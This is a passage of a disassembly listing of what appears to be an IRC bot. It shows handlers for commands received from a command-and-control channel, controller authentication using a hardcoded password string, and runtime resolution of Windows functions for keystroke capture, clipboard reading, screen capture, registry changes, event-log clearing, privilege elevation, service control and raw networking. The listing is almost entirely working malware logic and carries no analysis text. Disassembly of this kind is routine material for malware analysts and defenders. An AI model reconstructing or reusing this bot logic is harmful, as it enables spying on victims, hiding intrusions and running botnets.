call sub_41E710
cmp eax, 400h
pop ecx
jge loc_409A67
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40B38F
push eax
lea eax, [ebp+var_2C0]
push offset aNickS_7 ; "NICK %s"
push eax
call sub_41EA60
add esp, 1Ch
lea eax, [ebp+var_2C0]
push eax
push offset aS_25 ; "%s\r\n"
jmp loc_408B99
; ---------------------------------------------------------------------------
loc_40978F: ; CODE XREF: sub_401C87+3DD4�j
; sub_401C87+3DE9�j
mov esi, [ebp+arg_10]
push esi
call sub_41E710
test eax, eax
pop ecx
jle loc_4076C4
push esi
call sub_41E710
cmp eax, 400h
pop ecx
jge loc_4076C4
push offset aQuitLater_0 ; "QUIT :later\r\n"
push esi
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call sub_409C2F
pop ecx
pop ecx
push 1F4h
call ds:dword_4F534C ; Sleep
push esi
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F0C[eax]
call ds:dword_4E3060 ; closesocket
push [ebp+var_10]
push esi
call sub_41E710
imul eax, 234h
pop ecx
push ds:dword_455F14[eax]
call ds:dword_4F5380 ; TerminateThread
push esi
call sub_41E710
imul eax, 234h
push esi
mov ds:dword_455F14[eax], ebx
call sub_41E710
imul eax, 234h
pop ecx
pop ecx
mov byte ptr ds:dword_455D00[eax], bl
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_40983D: ; CODE XREF: sub_401C87+3DAA�j
; sub_401C87+3DBF�j
push [ebp+arg_10]
push offset aAll ; "all"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40987C
call sub_40B854
cmp eax, ebx
jle short loc_409864
push eax
push offset unk_443400
jmp loc_40755A
; ---------------------------------------------------------------------------
loc_409864: ; CODE XREF: sub_401C87+7BD0�j
push offset unk_443428
loc_409869: ; CODE XREF: sub_401C87+24B3�j
; sub_401C87+24D2�j ...
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
pop ecx
pop ecx
jmp loc_407569
; ---------------------------------------------------------------------------
loc_40987C: ; CODE XREF: sub_401C87+7BC7�j
mov eax, [ebp+var_A4]
lea esi, [eax+1]
jmp short loc_4098F3
; ---------------------------------------------------------------------------
loc_409887: ; CODE XREF: sub_401C87+7C6F�j
mov edi, [ebp+esi*4+var_90]
cmp edi, ebx
jz loc_4076C4
push edi
call sub_41E710
push eax
call sub_40B7CC
pop ecx
pop ecx
test eax, eax
push edi
lea eax, [ebp+var_2C0]
jz short loc_4098B6
push offset unk_443450
jmp short loc_4098BB
; ---------------------------------------------------------------------------
loc_4098B6: ; CODE XREF: sub_401C87+7C26�j
push offset unk_443474
loc_4098BB: ; CODE XREF: sub_401C87+7C2D�j
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4098E5
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_4098E5: ; CODE XREF: sub_401C87+7C40�j
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
pop ecx
inc esi
loc_4098F3: ; CODE XREF: sub_401C87+7BFE�j
cmp esi, 20h
jb short loc_409887
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_4098FD: ; CODE XREF: sub_401C87+3D80�j
; sub_401C87+3D95�j
cmp [ebp+var_C], ebx
jz loc_409A67
push [ebp+arg_10]
push [ebp+var_C]
call sub_41EBB0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409A67
push esi
push offset aS_26 ; "%s\r\n"
push [ebp+arg_4]
call sub_409C2F
push esi
push offset dword_4434A8
jmp loc_408D96
; ---------------------------------------------------------------------------
loc_409936: ; CODE XREF: sub_401C87+3D56�j
; sub_401C87+3D6B�j
push [ebp+arg_10]
push offset dword_4434C4
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_10]
push offset unk_4434D0
jmp loc_408D96
; ---------------------------------------------------------------------------
loc_409953: ; CODE XREF: sub_401C87+3D2C�j
; sub_401C87+3D41�j
push [ebp+esi+var_88]
push [ebp+arg_10]
push offset aJoinSS_3 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_10]
push offset unk_443504
jmp loc_408C69
; ---------------------------------------------------------------------------
loc_409977: ; CODE XREF: sub_401C87+3D02�j
; sub_401C87+3D17�j
push [ebp+arg_10]
push offset aNickS_8 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_10]
push offset unk_443534
jmp loc_408D96
; ---------------------------------------------------------------------------
loc_409994: ; CODE XREF: sub_401C87+316D�j
; sub_401C87+3182�j
push offset aQuitReconnec_0 ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
push offset unk_443570
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+arg_10]
call sub_41E710
add esp, 1Ch
loc_4099CC: ; CODE XREF: sub_401C87+7D91�j
push eax
call ds:dword_4F534C ; Sleep
loc_4099D3: ; CODE XREF: sub_401C87+2A9B�j
xor eax, eax
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_4099DA: ; CODE XREF: sub_401C87+3143�j
; sub_401C87+3158�j
push offset aQuitReconnec_1 ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_10]
lea eax, [ebp+var_2C0]
push offset unk_4435AC
push eax
call sub_41EA60
lea eax, [ebp+var_2C0]
push eax
call sub_415A3C
push [ebp+arg_10]
call sub_41E710
add esp, 1Ch
imul eax, 3E8h
jmp short loc_4099CC
; ---------------------------------------------------------------------------
loc_409A1A: ; CODE XREF: sub_401C87+E79�j
; sub_401C87+E8E�j
push [ebp+esi+var_8C]
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax
lea eax, [ebp+var_338]
push ds:dword_43F0A0
push eax
call sub_40B38F
lea eax, [ebp+var_338]
push eax
push offset aNickS_9 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409C2F
lea eax, [ebp+var_338]
push eax
push offset unk_4435E0
call sub_415AB0
loc_409A64: ; CODE XREF: sub_401C87+5322�j
add esp, 24h
loc_409A67: ; CODE XREF: sub_401C87+624�j
; sub_401C87+630�j ...
mov eax, [ebp+arg_24]
jmp loc_409C2A
; ---------------------------------------------------------------------------
loc_409A6F: ; CODE XREF: sub_401C87+A73�j
; sub_401C87+A88�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
mov [ebp+arg_10], esi
jz loc_4076C4
cmp [ebp+var_A8], ebx
jnz loc_4076C4
push offset asc_443604 ; "!~"
push [ebp+var_90]
call sub_41F870
mov esi, eax
push offset dword_4E2E80
push ebx
inc esi
call sub_41F870
push (offset asc_443604+2)
push eax
call sub_41F870
push [ebp+arg_10]
mov edi, eax
push offset a3zef ; "3zef"
call sub_41F7E0
add esp, 20h
test eax, eax
jz short loc_409B17
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_409C2F
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_409C2F
push edi
push esi
push offset unk_44365C
loc_409B03: ; CODE XREF: sub_401C87+7EE9�j
lea eax, [ebp+var_2C0]
push eax
call sub_41EA60
add esp, 30h
jmp loc_402593
; ---------------------------------------------------------------------------
loc_409B17: ; CODE XREF: sub_401C87+7E43�j
mov [ebp+arg_24], ebx
loc_409B1A: ; CODE XREF: sub_401C87+7EB0�j
mov eax, [ebp+arg_24]
push edi
push ds:off_43F158[eax]
call sub_40B9E4
pop ecx
test eax, eax
pop ecx
jnz short loc_409B72
add [ebp+arg_24], 4
cmp [ebp+arg_24], 4
jb short loc_409B1A
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_409C2F
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSYourA_0 ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_409C2F
push edi
push esi
push offset unk_4436DC
jmp short loc_409B03
; ---------------------------------------------------------------------------
loc_409B72: ; CODE XREF: sub_401C87+7EA6�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409B77: ; CODE XREF: sub_401C87+7F11�j
cmp [edi], bl
jnz short loc_409B8E
push [ebp+arg_10]
push offset a3zef ; "3zef"
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_409B9F
loc_409B8E: ; CODE XREF: sub_401C87+7EF2�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_409B77
jmp loc_4076C4
; ---------------------------------------------------------------------------
loc_409B9F: ; CODE XREF: sub_401C87+7F05�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_E00]
push 7Fh
push eax
push esi
call sub_41E510
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_409BD6
push ebx
push [ebp+var_4]
push offset unk_443708
push [ebp+var_88]
push [ebp+arg_4]
call sub_409C75
add esp, 14h
loc_409BD6: ; CODE XREF: sub_401C87+7F33�j
lea eax, [ebp+var_C0]
push eax
push offset unk_443728
jmp loc_40220D
; ---------------------------------------------------------------------------
loc_409BE7: ; CODE XREF: sub_401C87+202�j
; sub_401C87+217�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_409C2F
push offset aXI ; "-x+i"
push [ebp+arg_10]
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_409C2F
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_4 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409C2F
add esp, 2Ch
mov ds:dword_4E2E70, edi
loc_409C28: ; CODE XREF: sub_401C87+E9�j
; sub_401C87+F5�j ...
mov eax, edi
loc_409C2A: ; CODE XREF: sub_401C87+2A5A�j
; sub_401C87+2A7C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401C87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C2F proc near ; CODE XREF: sub_401B0B+3D�p
; sub_401C87+1BF�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_41F9C0
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
leave
retn
sub_409C2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C75 proc near ; CODE XREF: sub_401C87+4F3�p
; sub_401C87+132E�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice_3 ; "NOTICE"
jnz short loc_409C90
mov edi, offset aPrivmsg_2 ; "PRIVMSG"
loc_409C90: ; CODE XREF: sub_409C75+14�j
push edi
call sub_41BC70
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_41BC70
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset aS_12 ; "%s"
push esi
push eax
call sub_41EC30
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_41EA60
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4E3018 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_409D0E
push 7D0h
call ds:dword_4F534C ; Sleep
locret_409D0E: ; CODE XREF: sub_409C75+8C�j
leave
retn
sub_409C75 endp
; =============== S U B R O U T I N E =======================================
sub_409D10 proc near ; CODE XREF: sub_401404+4B�p
push ebx
push ebp
mov ebp, ds:off_4F5370
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; sub_50AF8C
mov esi, ds:off_4F5390
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_409E30
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; sub_50B076
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov ds:dword_4E3074, eax
call esi ; sub_50B076
push offset aProcess32first ; "Process32First"
push edi
mov ds:dword_4E2FE8, eax
call esi ; sub_50B076
push offset aProcess32next ; "Process32Next"
push edi
mov ds:dword_4E2FCC, eax
call esi ; sub_50B076
push offset aModule32first ; "Module32First"
push edi
mov ds:dword_4E2EDC, eax
call esi ; sub_50B076
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov ds:dword_4E2E88, eax
call esi ; sub_50B076
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov ds:dword_4E2EB8, eax
call esi ; sub_50B076
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov ds:dword_4E2F30, eax
call esi ; sub_50B076
push offset aSearchpatha ; "SearchPathA"
push edi
mov ds:dword_4E3028, eax
call esi ; sub_50B076
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov ds:off_4E3080, eax
call esi ; sub_50B076
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov ds:dword_4E2EE8, eax
call esi ; sub_50B076
cmp ds:dword_4E3074, ebx
mov ds:dword_4E2ED0, eax
jz short loc_409E0E
cmp ds:dword_4E2FE8, ebx
jz short loc_409E0E
cmp ds:dword_4E2FCC, ebx
jz short loc_409E0E
cmp ds:dword_4E2EDC, ebx
jz short loc_409E0E
cmp ds:dword_4E2EB8, ebx
jz short loc_409E0E
cmp ds:dword_4E2F30, ebx
jz short loc_409E0E
cmp ds:dword_4E3028, ebx
jz short loc_409E0E
cmp ds:off_4E3080, ebx
jz short loc_409E0E
cmp ds:dword_4E2EE8, ebx
jz short loc_409E0E
cmp eax, ebx
jnz short loc_409E18
loc_409E0E: ; CODE XREF: sub_409D10+B8�j
; sub_409D10+C0�j ...
mov ds:dword_4E3084, 1
loc_409E18: ; CODE XREF: sub_409D10+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; sub_50B076
cmp eax, ebx
mov ds:dword_4E3000, eax
jz short loc_409E45
push 1
push ebx
call eax
jmp short loc_409E45
; ---------------------------------------------------------------------------
loc_409E30: ; CODE XREF: sub_409D10+1D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E3088, eax
mov ds:dword_4E3084, 1
loc_409E45: ; CODE XREF: sub_409D10+117�j
; sub_409D10+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:off_4F538C
mov edi, eax
cmp edi, ebx
jz loc_409F5A
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; sub_50B076
push offset aFindwindowa ; "FindWindowA"
push edi
mov ds:dword_4E3024, eax
call esi ; sub_50B076
push offset aIswindow ; "IsWindow"
push edi
mov ds:dword_4E2FD4, eax
call esi ; sub_50B076
push offset aDestroywindow ; "DestroyWindow"
push edi
mov ds:dword_4E2F68, eax
call esi ; sub_50B076
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov ds:dword_4E3078, eax
call esi ; sub_50B076
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov ds:dword_4E2F98, eax
call esi ; sub_50B076
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov ds:dword_4E2FB8, eax
call esi ; sub_50B076
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov ds:dword_4E301C, eax
call esi ; sub_50B076
cmp ds:dword_4E3024, ebx
mov ds:dword_4E2F08, eax
jz short loc_409EFE
cmp ds:dword_4E2FD4, ebx
jz short loc_409EFE
cmp ds:dword_4E2F68, ebx
jz short loc_409EFE
cmp ds:dword_4E3078, ebx
jz short loc_409EFE
cmp ds:dword_4E2F98, ebx
jz short loc_409EFE
cmp ds:dword_4E2FB8, ebx
jz short loc_409EFE
cmp ds:dword_4E301C, ebx
jz short loc_409EFE
cmp eax, ebx
jnz short loc_409F08
loc_409EFE: ; CODE XREF: sub_409D10+1B8�j
; sub_409D10+1C0�j ...
mov ds:dword_4E308C, 1
loc_409F08: ; CODE XREF: sub_409D10+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; sub_50B076
push offset aGetkeystate ; "GetKeyState"
push edi
mov ds:dword_4E2F94, eax
call esi ; sub_50B076
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov ds:dword_4E2E9C, eax
call esi ; sub_50B076
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov ds:dword_4E2F64, eax
call esi ; sub_50B076
cmp ds:dword_4E2F94, ebx
mov ds:dword_4E2F4C, eax
jz short loc_409F65
cmp ds:dword_4E2E9C, ebx
jz short loc_409F65
cmp ds:dword_4E2F64, ebx
jz short loc_409F65
cmp eax, ebx
jnz short loc_409F6F
jmp short loc_409F65
; ---------------------------------------------------------------------------
loc_409F5A: ; CODE XREF: sub_409D10+144�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E3090, eax
loc_409F65: ; CODE XREF: sub_409D10+232�j
; sub_409D10+23A�j ...
mov ds:dword_4E308C, 1
loc_409F6F: ; CODE XREF: sub_409D10+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; sub_50AF8C
mov edi, eax
cmp edi, ebx
jz loc_40A128
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; sub_50B076
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov ds:dword_4E3038, eax
call esi ; sub_50B076
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov ds:dword_4E2F7C, eax
call esi ; sub_50B076
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov ds:dword_4E2FEC, eax
call esi ; sub_50B076
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov ds:dword_4E2EC8, eax
call esi ; sub_50B076
push offset aRegclosekey ; "RegCloseKey"
push edi
mov ds:dword_4E2F2C, eax
call esi ; sub_50B076
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov ds:dword_4E2FA4, eax
call esi ; sub_50B076
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov ds:dword_4E2F48, eax
call esi ; sub_50B076
cmp ds:dword_4E3038, ebx
mov ds:dword_4E2F58, eax
jz short loc_40A018
cmp ds:dword_4E2F7C, ebx
jz short loc_40A018
cmp ds:dword_4E2FEC, ebx
jz short loc_40A018
cmp ds:dword_4E2EC8, ebx
jz short loc_40A018
cmp ds:dword_4E2F2C, ebx
jz short loc_40A018
cmp ds:dword_4E2FA4, ebx
jnz short loc_40A022
loc_40A018: ; CODE XREF: sub_409D10+2DE�j
; sub_409D10+2E6�j ...
mov ds:dword_4E3094, 1
loc_40A022: ; CODE XREF: sub_409D10+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; sub_50B076
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov ds:dword_4E2FAC, eax
call esi ; sub_50B076
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ds:dword_4E2F84, eax
call esi ; sub_50B076
cmp ds:dword_4E2FAC, ebx
mov ds:dword_4E3034, eax
jz short loc_40A05D
cmp ds:dword_4E2F84, ebx
jz short loc_40A05D
cmp eax, ebx
jnz short loc_40A067
loc_40A05D: ; CODE XREF: sub_409D10+33F�j
; sub_409D10+347�j
mov ds:dword_4E3094, 1
loc_40A067: ; CODE XREF: sub_409D10+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; sub_50B076
push offset aOpenservicea ; "OpenServiceA"
push edi
mov ds:dword_4E2FBC, eax
call esi ; sub_50B076
push offset aStartservicea ; "StartServiceA"
push edi
mov ds:dword_4E2EA4, eax
call esi ; sub_50B076
push offset aControlservice ; "ControlService"
push edi
mov ds:dword_4E2EAC, eax
call esi ; sub_50B076
push offset aDeleteservice ; "DeleteService"
push edi
mov ds:dword_4E2F10, eax
call esi ; sub_50B076
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov ds:dword_4E2F14, eax
call esi ; sub_50B076
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov ds:dword_4E2EC0, eax
call esi ; sub_50B076
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov ds:dword_4E2F88, eax
call esi ; sub_50B076
cmp ds:dword_4E2FBC, ebx
mov ds:dword_4E2EB0, eax
jz short loc_40A10B
cmp ds:dword_4E2EA4, ebx
jz short loc_40A10B
cmp ds:dword_4E2EAC, ebx
jz short loc_40A10B
cmp ds:dword_4E2F10, ebx
jz short loc_40A10B
cmp ds:dword_4E2F14, ebx
jz short loc_40A10B
cmp ds:dword_4E2EC0, ebx
jz short loc_40A10B
cmp ds:dword_4E2F88, ebx
jz short loc_40A10B
cmp eax, ebx
jnz short loc_40A115
loc_40A10B: ; CODE XREF: sub_409D10+3C5�j
; sub_409D10+3CD�j ...
mov ds:dword_4E3094, 1
loc_40A115: ; CODE XREF: sub_409D10+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; sub_50B076
cmp eax, ebx
mov ds:dword_4E2EA8, eax
jnz short loc_40A13D
jmp short loc_40A133
; ---------------------------------------------------------------------------
loc_40A128: ; CODE XREF: sub_409D10+26A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E3098, eax
loc_40A133: ; CODE XREF: sub_409D10+416�j
mov ds:dword_4E3094, 1
loc_40A13D: ; CODE XREF: sub_409D10+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; sub_50AF8C
mov edi, eax
cmp edi, ebx
jz loc_40A209
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; sub_50B076
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov ds:dword_4E2FB4, eax
call esi ; sub_50B076
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov ds:dword_4E300C, eax
call esi ; sub_50B076
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov ds:dword_4E3014, eax
call esi ; sub_50B076
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov ds:dword_4E2FD0, eax
call esi ; sub_50B076
push offset aSelectobject ; "SelectObject"
push edi
mov ds:dword_4E2EEC, eax
call esi ; sub_50B076
push offset aBitblt ; "BitBlt"
push edi
mov ds:dword_4E2E98, eax
call esi ; sub_50B076
push offset aDeletedc ; "DeleteDC"
push edi
mov ds:dword_4E3010, eax
call esi ; sub_50B076
push offset aDeleteobject ; "DeleteObject"
push edi
mov ds:dword_4E2E84, eax
call esi ; sub_50B076
cmp ds:dword_4E2FB4, ebx
mov ds:dword_4E2F24, eax
jz short loc_40A214
cmp ds:dword_4E300C, ebx
jz short loc_40A214
cmp ds:dword_4E3014, ebx
jz short loc_40A214
cmp ds:dword_4E2FD0, ebx
jz short loc_40A214
cmp ds:dword_4E2EEC, ebx
jz short loc_40A214
cmp ds:dword_4E2E98, ebx
jz short loc_40A214
cmp ds:dword_4E3010, ebx
jz short loc_40A214
cmp ds:dword_4E2E84, ebx
jz short loc_40A214
cmp eax, ebx
jnz short loc_40A21E
jmp short loc_40A214
; ---------------------------------------------------------------------------
loc_40A209: ; CODE XREF: sub_409D10+438�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30A0, eax
loc_40A214: ; CODE XREF: sub_409D10+4B9�j
; sub_409D10+4C1�j ...
mov ds:dword_4E309C, 1
loc_40A21E: ; CODE XREF: sub_409D10+4F5�j
mov ebp, ds:off_4F538C
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; sub_50AE83
mov edi, eax
cmp edi, ebx
jz loc_40A4DA
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; sub_50B076
push offset aWsasocketa ; "WSASocketA"
push edi
mov ds:dword_4E2F38, eax
call esi ; sub_50B076
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov ds:dword_4E306C, eax
call esi ; sub_50B076
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov ds:dword_4E2ED8, eax
call esi ; sub_50B076
push offset aWsaioctl ; "WSAIoctl"
push edi
mov ds:dword_4E2EB4, eax
call esi ; sub_50B076
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov ds:dword_4E2F74, eax
call esi ; sub_50B076
push offset aWsacleanup ; "WSACleanup"
push edi
mov ds:dword_4E2F5C, eax
call esi ; sub_50B076
push offset aSocket ; "socket"
push edi
mov ds:dword_4E2F20, eax
call esi ; sub_50B076
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov ds:dword_4E3048, eax
call esi ; sub_50B076
push offset aConnect ; "connect"
push edi
mov ds:dword_4E3064, eax
call esi ; sub_50B076
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov ds:dword_4E2F70, eax
call esi ; sub_50B076
push offset aInet_addr ; "inet_addr"
push edi
mov ds:dword_4E3054, eax
call esi ; sub_50B076
push offset aHtons ; "htons"
push edi
mov ds:dword_4E3008, eax
call esi ; sub_50B076
push offset aHtonl ; "htonl"
push edi
mov ds:dword_4E2FC8, eax
call esi ; sub_50B076
push offset aNtohs ; "ntohs"
push edi
mov ds:dword_4E2FC4, eax
call esi ; sub_50B076
push offset aNtohl ; "ntohl"
push edi
mov ds:dword_4E2EF8, eax
call esi ; sub_50B076
push offset aSend_0 ; "send"
push edi
mov ds:dword_4E2EF0, eax
call esi ; sub_50B076
push offset aSendto ; "sendto"
push edi
mov ds:dword_4E3018, eax
call esi ; sub_50B076
push offset aRecv ; "recv"
push edi
mov ds:dword_4E302C, eax
call esi ; sub_50B076
push offset aRecvfrom ; "recvfrom"
push edi
mov ds:dword_4E2FE0, eax
call esi ; sub_50B076
mov ds:dword_4E2FA0, eax
push offset aBind ; "bind"
push edi
call esi ; sub_50B076
push offset aSelect ; "select"
push edi
mov ds:dword_4E2FF4, eax
call esi ; sub_50B076
push offset aListen ; "listen"
push edi
mov ds:dword_4E2FB0, eax
call esi ; sub_50B076
push offset aAccept ; "accept"
push edi
mov ds:dword_4E2FF0, eax
call esi ; sub_50B076
push offset aSetsockopt ; "setsockopt"
push edi
mov ds:dword_4E305C, eax
call esi ; sub_50B076
push offset aGetsockname ; "getsockname"
push edi
mov ds:dword_4E2FA8, eax
call esi ; sub_50B076
push offset aGethostname ; "gethostname"
push edi
mov ds:dword_4E2F6C, eax
call esi ; sub_50B076
push offset aGethostbyname ; "gethostbyname"
push edi
mov ds:dword_4E2FDC, eax
call esi ; sub_50B076
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov ds:dword_4E304C, eax
call esi ; sub_50B076
push offset aGetpeername ; "getpeername"
push edi
mov ds:dword_4E2F80, eax
call esi ; sub_50B076
push offset aClosesocket ; "closesocket"
push edi
mov ds:dword_4E2F1C, eax
call esi ; sub_50B076
cmp ds:dword_4E2F38, ebx
mov ds:dword_4E3060, eax
jz loc_40A4E5
cmp ds:dword_4E306C, ebx
jz loc_40A4E5
cmp ds:dword_4E2ED8, ebx
jz loc_40A4E5
cmp ds:dword_4E2F74, ebx
jz loc_40A4E5
cmp ds:dword_4E2F5C, ebx
jz loc_40A4E5
cmp ds:dword_4E2F20, ebx
jz loc_40A4E5
cmp ds:dword_4E3048, ebx
jz loc_40A4E5
cmp ds:dword_4E3064, ebx
jz loc_40A4E5
cmp ds:dword_4E2F70, ebx
jz loc_40A4E5
cmp ds:dword_4E3054, ebx
jz loc_40A4E5
cmp ds:dword_4E3008, ebx
jz loc_40A4E5
cmp ds:dword_4E2FC8, ebx
jz loc_40A4E5
cmp ds:dword_4E2FC4, ebx
jz loc_40A4E5
cmp ds:dword_4E2EF8, ebx
jz short loc_40A4E5
cmp ds:dword_4E3018, ebx
jz short loc_40A4E5
cmp ds:dword_4E302C, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FE0, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FA0, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FF4, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FB0, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FF0, ebx
jz short loc_40A4E5
cmp ds:dword_4E305C, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FA8, ebx
jz short loc_40A4E5
cmp ds:dword_4E2F6C, ebx
jz short loc_40A4E5
cmp ds:dword_4E2FDC, ebx
jz short loc_40A4E5
cmp ds:dword_4E304C, ebx
jz short loc_40A4E5
cmp ds:dword_4E2F80, ebx
jz short loc_40A4E5
cmp eax, ebx
jnz short loc_40A4EF
jmp short loc_40A4E5
; ---------------------------------------------------------------------------
loc_40A4DA: ; CODE XREF: sub_409D10+51F�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ds:dword_4E30A8, eax
loc_40A4E5: ; CODE XREF: sub_409D10+6BE�j
; sub_409D10+6CA�j ...
mov ds:dword_4E30A4, 1
loc_40A4EF: ; CODE XREF: sub_409D10+7C6�j
